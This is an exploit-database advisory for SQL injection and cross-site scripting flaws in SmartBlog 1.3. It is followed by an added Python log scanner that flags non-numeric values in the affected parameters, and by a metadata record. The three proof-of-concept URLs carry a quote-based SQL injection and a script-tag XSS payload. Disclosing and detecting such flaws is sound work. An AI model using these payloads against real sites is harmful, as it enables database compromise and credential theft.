SmartBlog 1.3 SQL Injection and Cross-Site Scripting Vulnerabilities
Published: 2010-04-27T00:00:00
ID: EDB-ID:33889
Type: exploitdb
Reporter: indoushka
Modified: 2010-04-27T00:00:00
Description
SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/39756/info
SmartBlog is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SmartBlog 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/v1.3/?mois=%2527&an=2010
http://www.example.com/v1.3/commentaire.php?id='
http://www.example.com/v1.3/?mois=3&an=>"><ScRiPt>alert(213771818860)</ScRiPt>
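For detection, the following Python code is an added example, not part of the original advisory or of SmartBlog's code. It flags access-log requests in which the `mois`, `an` or `id` parameters named above carry anything other than digits, decoding repeatedly so that the double-encoded `%2527` form is caught. The integer-only expectation for these parameters, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Parameters named in the advisory. Treating them as integer-only is an assumption.
NUMERIC_PARAMS = {"mois", "an", "id"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]+")

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double encoding (%2527 -> %27 -> ') is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(name, decoded_value)] for numeric parameters that carry non-digits."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    # Split on the raw '&' before decoding so an encoded '&' cannot hide a parameter.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        name, value = fully_decode(name), fully_decode(raw)
        if name in NUMERIC_PARAMS and not DIGITS_RE.fullmatch(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_index, hits)] for every log line with at least one hit."""
    results = [(i, suspicious_params(line)) for i, line in enumerate(lines)]
    return [(i, hits) for i, hits in results if hits]

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Apr/2010:10:00:01 +0000] "GET /v1.3/?mois=3&an=2010 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Apr/2010:10:00:07 +0000] "GET /v1.3/?mois=%2527&an=2010 HTTP/1.1" 200 312',
    '203.0.113.9 - - [27/Apr/2010:10:00:09 +0000] "GET /v1.3/commentaire.php?id=%27 HTTP/1.1" 200 298',
    '203.0.113.9 - - [27/Apr/2010:10:00:12 +0000] "GET /v1.3/?mois=3&an=%3E%22%3E%3CScRiPt%3E HTTP/1.1" 200 5240',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(index, hits)
```

The same integer-only rule, enforced in the application before the values reach a query or the page output, is the corresponding server-side check.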
{"id": "EDB-ID:33889", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SmartBlog 1.3 SQL Injection and Cross-Site Scripting Vulnerabilities", "description": "SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform", "published": "2010-04-27T00:00:00", "modified": "2010-04-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/33889/", "reporter": "indoushka", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:04:58", "viewCount": 1, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-03T20:04:58", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-03T20:04:58", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/33889/", "sourceData": "source: http://www.securityfocus.com/bid/39756/info\r\n\r\nSmartBlog is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nSmartBlog 1.3 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/v1.3/?mois=%2527&an=2010\r\nhttp://www.example.com/v1.3/commentaire.php?id='\r\nhttp://www.example.com/v1.3/?mois=3&an=>\"><ScRiPt>alert(213771818860)</ScRiPt>\r\n", "osvdbidlist": []}